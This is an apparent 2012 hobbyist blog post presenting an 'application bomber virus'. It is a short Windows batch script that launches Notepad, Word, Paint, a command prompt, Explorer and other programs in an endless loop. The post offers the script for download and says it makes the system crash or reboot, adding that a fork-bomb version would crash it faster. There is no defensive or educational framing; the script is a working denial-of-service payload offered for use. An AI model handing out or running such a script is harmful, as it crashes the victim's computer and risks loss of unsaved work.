Tuesday, April 24, 2012

APPLICATION BOMBER VIRUS

Application Bomber
Application bomber is a superset of window bomber, this has a close relation to the fork bomber program, where in this ‘application bomber’ we don’t call the program using the name itself (simply known as fork), where as we are going to open up applications continuously using a loop.

@echo off
:hey
start notepad
start winword
start mspaint
start write
start cmd
start explorer
start control
start calc
goto hey


DOWNLOAD CODE HERE

When the above given batch program is executed, it will open up the following applications such as notepad, word document, Microsoft paint, WordPad, command prompt, my documents, control panel, and calculator in an infinite loop causing the system to collapse and as a result the system simply crashes or reboots. Just imagine the same using a fork concept; oops! it will make the system crash immediately.